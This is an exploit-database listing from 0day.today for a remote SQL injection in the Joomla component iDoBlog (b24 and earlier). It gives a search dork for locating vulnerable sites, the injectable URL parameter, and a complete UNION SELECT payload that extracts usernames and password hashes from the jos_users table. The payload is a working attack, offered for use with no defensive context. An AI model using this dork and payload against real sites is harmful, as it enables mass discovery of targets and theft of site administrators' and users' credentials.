[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component iDoBlog <= b24 Remote SQL Injection Vulnerability

Author
His0k4
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3112
Category
web applications
Date add
02-06-2008
Platform
unsorted
==================================================================
Joomla Component iDoBlog <= b24 Remote SQL Injection Vulnerability
==================================================================



#########################################################
#							#
#    Joomla Component idoblog Remote SQL Injection	#
#							#
#########################################################

########################################

[*] Founded by : His0k4 (Algerian HaCkeR);
[*] Greetz :     All friends & muslims HaCkeRs  :) 

########################################

[*] Script_Name: "Joomla"
[*] Component_Name: "com_idoblog"

########################################

[*] DORK: inurl:com_idoblog

########################################

[*] P.O.C : /index.php?option=com_idoblog&task=userblog&userid={SQL}
[*] Example: /index.php?option=com_idoblog&task=userblog&userid=<valid_userid> and 1=1 UNION SELECT user(),user(),user(),user(),user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user(),user(),user(),user() FROM jos_users--

########################################



#  0day.today [2024-12-23]  #